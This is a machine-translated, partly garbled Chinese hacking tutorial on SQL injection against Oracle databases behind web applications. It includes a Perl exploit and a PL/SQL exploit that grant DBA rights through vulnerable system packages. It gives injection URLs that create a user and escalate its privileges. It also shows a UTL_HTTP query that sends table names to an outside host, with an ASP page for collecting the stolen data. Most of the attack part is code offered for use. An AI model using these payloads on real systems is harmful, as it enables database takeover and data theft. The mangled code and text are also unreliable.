ART of Web-sql-injection 2nd Volume Oracle Chapter _ Security Tutorial

Article Author: kj021320
Source of information: Evil Octal Information Security team (www.eviloctal.com)

Note: This article starts I.S.T.O technical team, after the original creator friendship submits to the evil Octal information Security Team Forum.
author:kj021320
Team:i.s.t.o
A lot of people say what ASP PHP JSP injection In fact, the most direct injection is related to the database! However, those scripts are just an auxiliary
For example, the asp/aspx JSP has no restrictions! and PHP will be ' filtered to \ ' But if not MySQL POSTGRESQL sqlite This function will be abolished!
But I think these scripting languages are not ruthless ~ if CFM says you don't have a discount! For specific database information, please refer to the
ART of Web-sql-injection 1th volume thanks to Amxsa and i.c.e more of my support

OK to come to the point, in foreign attacks on Oracle has been very concerned about, but the domestic research is not too many people, or technology is not enough ~ Here I will be the first cannon!
Sqlinjection is to look at the database of SQL parsing engine, Oracle This does not support the implementation of multiple statements!
If you use plsql those tools can be used; To execute multiple statements!
That's because the tools help you make multiple statements submitted separately
Oracle injection in foreign countries to propose a number of attacks, but can be used to web SQL injection not much!
In the early NGS and Argeniss are relatively proposed function/procedure injection way!
That is, some of the functions or stored procedures defined by the user are stored sql-injection
I take a MSSQL function as an example
Create function isto_kj021320 (@sql varchar (100))
RETURNS int
Begin
EXEC (' SELECT * from KJ021320 WHERE name= ' + @sql + '];
End
The above way undoubtedly @sql this parameter without filtering the presence of SQL injection!
The same approach in Oracle is particularly remarkable, starting with user-defined functions to system functions
The functions inside the system package are generally operating some system tables! Ordinary users are no way to check
But call these system functions to get the appropriate information ~
Easy to understand Oracle Rights management mechanisms

User---> Call functions (Permissions that inherit the creator of the function)---> Perform actions
Then we only need to do is to change the functions inside the operation to add users, build DBAs and so on ...

MILW0RM securityfocus Red Database Security ... The published method is very simple to say to the application and not to explain the truth ~
I'll explain it to you in the reprint.
For example, the following official announcement is
Dbms_cdc_subscribe. Activate_subscription This function of this package to store injection
OK the exploit published on MILW0RM is a code written in Perl

Use warnings;
Use strict;
Use DBI;
Use GETOPT::STD;
Use VARs qw/%opt/;

Sub Usage {
Print << "USAGE";

Syntax: $0-h
Options:
-H -S <sid> target SID name
-U <user> User
-P <passwd> Password

-g|-r (g) Rant dba to user | (r) Evoke dba from user
[-P <port> Oracle Port]

USAGE
Exit 0
}

My $opt _string = ' h:s:u:p:grp: ';
Getopts ($opt _string, \%opt) or &usage;
&usage if (! $opt {h} or! $opt {s} or! $opt {u} or! $opt {p});
&usage if (! $opt {g} and! $opt {R});
My $user = UC $opt {u};

my $dbh = undef;
if ($opt {P}) {
$DBH = Dbi->connect ("dbi:oracle:host= $opt {h};sid= $opt {s};p ort= $opt {p}", $opt {u}, $opt {p}) or die;
} else {
$DBH = Dbi->connect ("dbi:oracle:host= $opt {h};sid= $opt {s}", $opt {u}, $opt {p}) or die;
}

My $sqlcmd = "GRANT DBA to $user";
Print "[-] wait...\n";

if ($opt {r}) {
print [-] revoking DBA from $user ... \ n ";
$sqlcmd = "REVOKE DBA from $user";
$DBH->do ($sqlcmd);
Print "[-] done!\n";
$DBH->disconnect;
Exit
}

Print "[-] creating evil function...\n";
$DBH->do (qq{
CREATE OR REPLACE FUNCTION OWN return number
Authid Current_User AS
PRAGMA autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE ' $sqlcmd '; COMMIT;
return (0);
End;
} );

print [-] go ... (Don ' t worry about errors)!\n ";
My $sth = $dbh->prepare (qq{
BEGIN
SYS. Dbms_cdc_subscribe. Activate_subscription (' | | $user. own| | ");
End;
});
$sth->execute;
$sth->finish;
print [-] you GOT the powah!! \ n ";
$DBH->disconnect;
Exit

-------


The above method is actually the first to establish a function called OWN inside the operation is
Grant DBA to $user give DBA authority to a user!
And then into a stored procedure where there is an injection.
SYS. Dbms_cdc_subscribe. Activate_subscription (Put the own function);
Because
Activate_subscription method exists to inject
So the own function is executed directly to add a permission
Here is a demonstration of the need to create a function first! But we can not write multiple SQL to build a function when we web SQL INJ!
What's the way?
Activate_subscription presence of injection of course can also be blocked in the following statements! Similar to our web SQL INJ.
How do you know how to detect ORACLE function injection, next time I will write a << test function injected in oracle>> article

The above principle introduced the beginning combat!
Remember that a lot of articles say that if SQL statements are written like this
Sqlstr= "BEGIN select * from kj021320 where name= $name;";
Can execute multiple statements! Actually, this is nonsense! Now, which of the code is going to be like this, you're generally directly manipulating SQL.
Sqlstr= "SELECT * from kj021320 where name= $name";
So in the ORACLE Web, SQL injection can only use functions, stored procedures cannot be used! Specifically why do you go to see the document

There is an injection point on the web
The http://127.0.0.1:8080/VOA/test.jsp?id=282 digital type
So let's start by confirming the user's permissions.
http://127.0.0.1:8080/VOA/test.jsp?id=282 and exists (SELECT * from Dba_tables)
Here's a little detail
Talk about Oracle's system table section
Only users with DBA authority at the beginning of the DBA can access such as Dba_users Dba_tables
And the average user can query
User_tables and all_tables These two system tables the former is the user's own table! The latter is your own watch and the table you are authorized to inquire about!
The general injection software only needs to query these two tables to get the user's table structure.

Return to the top of the injection will generally return FALSE!
It doesn't matter. It doesn't matter if we have the right to inject.
So how do you confirm the location of the Oracle host now? Which means his IP is the same machine as the web.
Then we use
Utl_http the request function in this package
Example:
SELECT utl_http.request (' Http://www.isto.cn/getdata.asp?data= ' | | table_name) from User_tables WHERE rownum<=1
He will send the data as a URL request sent out! Large databases have remote data calls in the way you can see
ART of Web-sql-injection Volume 1th

So how do we construct this injection? Very simple!
http://127.0.0.1:8080/VOA/test.jsp?id=282 and ' 1 ' in (SELECT utl_http.request (' Http://www.isto.cn/getdata.asp?data= '|| table_name) from User_tables)
This way!
However, we have to construct a page to receive the request parameters! ASP Simple Implementation
<%
If request ("data") = "" Then
Response. Write application ("Oracle_data")
Else
Dim DataValue
Datavalue=request. ServerVariables ("Remote_host") & "Data:" & Request ("Data") & "<br>"
If request ("clear") <> "then
Application ("Oracle_data") =datavalue
Else
Application ("Oracle_data") =application ("Oracle_data") & DataValue
End If
End If
%>
Unless his database is intranet otherwise we can all get his IP address and data ~ Bi Chai table is also fast!

Next we can get his IP and sweep his ora port Sid can be retrieved through a select query or Tnscmd detected!

I'm just a little bit more straight off the pitch!
To take out a oday published 06 years abroad
Get_domain_index_tables But there seems to be no more use of information abroad.
That's it, look at the explanation.

CREATE OR REPLACE
PACKAGE mybadpackage Authid Current_User
Is
FUNCTION Odciindexgetmetadata (Oindexinfo sys.odciindexinfo,p3
VARCHAR2,P4 varchar2,env sys.odcienv)
return number;
End;
/
CREATE OR REPLACE PACKAGE body mybadpackage
Is
FUNCTION Odciindexgetmetadata (Oindexinfo sys.odciindexinfo,p3
VARCHAR2,P4 varchar2,env sys.odcienv)
return number
Is
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE ' GRANT DBA to HACKER ';
COMMIT;
return (1);
End;
End;
/
DECLARE
Index_name VARCHAR2 (200);
Index_schema VARCHAR2 (200);
Type_name VARCHAR2 (200);
Type_schema VARCHAR2 (200);
VERSION VARCHAR2 (200);
Newblock Pls_integer;
Gmflags number;
V_return VARCHAR2 (200);
BEGIN
Index_name: = ' A1 '; Index_schema: = ' HACKER ';
Type_name: = ' mybadpackage '; Type_schema: = ' HACKER ';
VERSION: = ' 10.2.0.2.0 '; Gmflags: = 1;
V_return: = SYS. Dbms_export_extension. Get_domain_index_metadata (
Index_name => index_name, Index_schema => Index_schema, type_name
=> Type_name,
Type_schema => Type_schema, version => version, Newblock =>
Newblock, Gmflags => gmflags
);
End;
/

Specific injection point in the 3rd parameter
I'm not using a function form now.
Insert the SQL statement directly inside

SYS. Dbms_export_extension. Get_domain_index_tables (' FOO ', ' BAR ', ' dbms_output '). Put (:P 1); EXECUTE IMMEDIATE ' DECLARE PRAGMA autonomous_transaction; BEGIN EXECUTE IMMEDIATE ' CREATE USER KJ021320 identified by KJ021320 '; end; '; end;--', ' SYS ', 0, ' 1 ', 0)
So you can build a user!
We construct SQL

http://127.0.0.1:8080/VOA/test.jsp?id=282 and ' ' | | SYS. Dbms_export_extension. Get_domain_index_tables (' FOO ', ' BAR ', ' dbms_output '). Put (:P 1); EXECUTE IMMEDIATE ' DECLARE PRAGMA autonomous_transaction; BEGIN EXECUTE IMMEDIATE ' CREATE USER KJ021320 identified by KJ021320 '; end; '; end;--', ' SYS ', 0, ' 1 ', 0) = '
The submission will create a KJ021320 user and the password is KJ021320
It's OK to set up the user also can not ~ ~ First to give this user the right to add a connection
http://127.0.0.1:8080/VOA/test.jsp?id=282 and ' ' | | SYS. Dbms_export_extension. Get_domain_index_tables (' FOO ', ' BAR ', ' dbms_output '). Put (:P 1); EXECUTE IMMEDIATE ' DECLARE PRAGMA autonomous_transaction; BEGIN EXECUTE IMMEDIATE ' ' GRANT CONNECT to KJ021320 '; end; '; end;--', ' SYS ', 0, ' 1 ', 0) = '
Then add a DBA authority with this method! Now that you're Oracle's DBA, what's the way to write a local file with a shell?
There are many ways to do it! Don't say back up! Pro*c SQLJ All can! Then leave it to you!

Video Demo Http://www.isto.cn/vedio/artwebinj-oracle.rar

PS: Before the use of a few of the MSSQL to Superhei said someone has published! It's so depressing! It seems that I am not only ignorant of the simple! Publication time is still a key issue! Oh! Now this estimate is not a person in the country has been sent, right? You can call yourself a voice. Chinese web SQL injection in the father of Oralce ~ haha! Pack A, Finish! -_-